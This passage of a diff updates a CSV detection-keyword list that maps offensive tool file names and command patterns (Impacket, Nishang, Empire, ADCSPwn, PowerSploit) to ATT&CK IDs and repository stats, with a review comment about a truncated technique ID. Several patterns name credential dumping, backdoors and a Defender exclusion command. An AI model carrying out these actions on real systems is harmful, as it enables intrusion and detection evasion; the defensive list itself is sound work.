fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*adconnectdump.py*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adconnectdump-master*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*adcs_enum.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*adcs_enum_com2.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*ADCS_Maybe_ESC8_HTTPS_Vulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*adcsattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*adcskiller.py*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*ADCSPwn.csproj*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn.exe*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" -"*ADCSPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADCSPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ADCSPwn.sln*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*ADCSPwn-master*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - 
T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*add_evasion check_fast_forwarding*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" 
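Review bot: The two sharpcollection rows re-added in this hunk (`*ADCollector.exe*` and `*ADCSPwn.exe*`) still end their technique column with a truncated `T12`, which is not a complete ATT&CK ID, so the star-count refresh carries the cut-off value forward. The column should end at the last complete ID, `... - T1227 - T1247"`, or the missing IDs should be restored from wherever the list was generated. `*ADCSPwn.exe*` is also present twice in this hunk, once under ADCSPwn with severity `10` and once under sharpcollection with severity `N/A`, so a rule generator that keys on the keyword alone would presumably get an ambiguous tool name and score. Giving the sharpcollection row the same severity, or dropping the duplicate keyword, would keep alert triage consistent.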
@@ -7023,26 +7166,27 @@ "*Add_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*addcomputer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Add-ConstrainedDelegationBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Add-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*addcomputer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Add-ConstrainedDelegationBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Add-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Add-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*AddKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*AddKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*AddKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Add-MpPreference -ExclusionPath *","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 
T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","1","15","2","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z" -"*Add-Persistence *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Add-Persistence*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Add-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Add-Persistence *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Add-Persistence*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Add-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a 
framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*addpriv SeloadDrivePrivilege*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*Add-PSFirewallRules*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Add-RegBackdoor.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Add-PSFirewallRules*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Add-RegBackdoor.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Add-RemoteRegBackdoor*","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-RemoteRegBackdoor*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*addresshunter.h*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*Add-ServiceDacl *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - 